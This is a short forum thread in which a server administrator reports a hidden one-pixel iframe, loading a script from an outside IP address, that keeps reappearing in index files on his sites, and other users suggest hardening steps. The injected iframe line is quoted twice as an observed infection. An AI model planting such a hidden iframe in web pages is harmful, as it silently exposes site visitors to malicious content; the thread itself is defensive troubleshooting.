i think it's virus

adamp

Verified User
Joined
Jan 11, 2007
Messages
137
this code:

<iframe src='http://78.109.21.114/t.php' width='1' height='1' style='visibility: hidden;'></iframe>


enter to indexes files in sites, forums and other program sites that situated in my servers.

we are delete this INFRAME and we do update proFTPD to vesrsion 1.3.1
and this frame is all time comeback some one know how to fix this problem?
 
Last edited:
this code:

Code:
<iframe src='http://78.109.21.114/t.php' width='1' height='1' style='visibility: hidden;'></iframe>

enter to indexes files in sites, forums and other program sites that situated in my servers.
You'll have to secure and harden your server to stop these annoying amateur "hackers".
 
The code is injected to Your pages.

1. Disable dangerous functions and turn off Register_globals in php.ini
2. Use mod_security

Make a search on the this forum for ELS (easy linux script)
Use it to harden Your server. It will done most of the job You need.

Regards
 
Back
Top